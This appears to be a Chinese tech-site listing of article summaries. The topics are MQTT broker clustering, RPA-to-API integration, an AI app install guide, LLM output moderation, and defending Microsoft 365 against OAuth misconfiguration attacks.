FreeMQTT Plus 是一个MQTT Broker 集群的实现 • 首创黑白(A/B)节点架构。 • FreeMQTT plus 是用Python语言并基于Tornado框架开发的。 本文阐述这种黑白(A/B)节点架构是如何提升MQTT Broker集群的可靠性、可扩展性。
|
18小时前
|
人工智能 API 数据安全/隐私保护
RPA与API/HTTP接口打通实战:Webhook回调、多系统数据同步与ERP对接方案详解
本文深入解析RPA与API/HTTP接口融合的实战路径,破除“人肉ETL”困局:从Webhook事件驱动实现秒级数据同步,到多系统(电商、ERP、WMS等)高效对接方案;涵盖双向同步、中央枢纽架构及ERP四大核心场景落地;并指出API幂等性、密钥管理、数据标准化等关键避坑点。强调真正智能自动化应支持内网部署、自然语言建模与AI自愈能力——让技术回归业务本质。
|
12小时前
|
存储 人工智能 API
小龙虾安装教程TopClaw中文版,OpenClaw AI免费部署指南
本文手把手教你零代码安装“小龙虾”(OpenClaw AI中文版TopClaw):兼容Win10/11、Mac全芯片,3分钟一键安装;内置中文界面、模型一键下载、本地运行保隐私;支持API调用、VS Code/Obsidian接入,免费、安全、易上手。
43 1
|
17小时前
|
自然语言处理 运维 安全
大模型输出安全体系:风控检测、敏感熔断、内容降级与合规策略机制实践.167
大模型输出风控是生成后、展示前的安全屏障,涵盖敏感词熔断、违规屏蔽、流式截断、内容降级与合规兜底五级机制,实现高危拦截、中危柔改、低危优化,兼顾安全合规与用户体验。
|
14小时前
|
运维 安全 网络协议
微软 365 条件访问策略错配引发 OAuth 授权链路攻击及闭环防护研究
本文剖析2026年两起大规模云身份入侵事件,揭示条件访问策略四大典型错配(MFA范围局限、高危OAuth流未阻断、仅报告不强制、客户端豁免),导致设备码钓鱼与ROPC爆破绕过MFA。提出“自动化检测—强策略约束—情报联动—灰度上线”四层闭环防御体系,并提供PowerShell基线检测脚本,助力企业加固Microsoft 365/Entra ID身份安全。(240字)
24 0